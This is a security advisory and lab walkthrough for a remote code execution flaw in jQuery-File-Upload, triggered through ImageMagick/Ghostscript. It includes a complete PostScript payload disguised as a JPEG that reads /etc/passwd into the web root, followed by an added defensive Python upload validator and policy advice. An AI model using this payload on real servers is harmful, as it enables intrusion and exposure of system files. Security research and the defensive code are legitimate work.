jQuery-File-Upload <= 9.x Remote Code Execution Exploit (ImageMagick/Ghostscript)


jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability, which was fixed in the release of v9.22.2. While reviewing the code, the VulnSpy team found another serious vulnerability: command execution. It allows attackers to execute arbitrary system commands by uploading malicious picture files.

Exploit

1. Click the START TO HACK button in the upper right corner to create an online environment.

2. Open the target address from the projects list.

3. Upload the file vsplate.jpg, which contains the malicious code.

vsplate.jpg (executes cat /etc/passwd > /var/www/html/vsplate.txt):

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat /etc/passwd > /var/www/html/vsplate.txt) currentdevice putdeviceprops

4. Visit http://target.vsplate.me/vsplate.txt
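
A defensive check for the upload shown above, as an added example (not code from VulnSpy or the jQuery-File-Upload project): it classifies a file by its leading bytes instead of its name, so a PostScript file renamed to .jpg is rejected before any image library processes it. The function names, the allow-list and the sample byte strings are assumptions made for this example.

```python
import os

# Leading bytes of the image types this example accepts (assumed allow-list).
IMAGE_MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# File extensions permitted for each sniffed type.
EXTENSIONS = {"jpeg": {".jpg", ".jpeg"}, "png": {".png"}, "gif": {".gif"}}
# Signatures of formats that ImageMagick hands to Ghostscript:
# PostScript/EPS ("%!"), PDF, and the binary DOS EPS header.
GHOSTSCRIPT_MAGIC = (b"%!", b"%PDF-", b"\xc5\xd0\xd3\xc6")


def sniff_image_type(data: bytes):
    """Return 'jpeg', 'png' or 'gif' from the leading bytes, else None."""
    for kind, magics in IMAGE_MAGIC.items():
        if data.startswith(magics):
            return kind
    return None


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason_or_type) for an upload, judged by content."""
    # The allow-list below would reject these anyway; checking first gives
    # a distinct reason that can be logged and alerted on.
    if data.startswith(GHOSTSCRIPT_MAGIC):
        return False, "postscript-or-pdf-content"
    kind = sniff_image_type(data)
    if kind is None:
        return False, "unrecognised-content"
    # The claimed extension must agree with what the bytes say.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in EXTENSIONS[kind]:
        return False, "extension-mismatch"
    return True, kind


# Constructed samples: the opening lines of the page's vsplate.jpg,
# and a minimal JPEG/JFIF header padded with zero bytes.
PS_AS_JPG = b"%!PS\nuserdict /setpagedevice undef\nsave\nlegal\n"
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in (("vsplate.jpg", PS_AS_JPG), ("photo.jpg", REAL_JPG)):
        print(name, validate_upload(name, blob))
```

Content sniffing is one layer only; disabling the PS, EPS and PDF coders in ImageMagick's policy.xml closes the Ghostscript delegate path regardless of what reaches the library.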

All rights reserved. © 2018 VULNSPY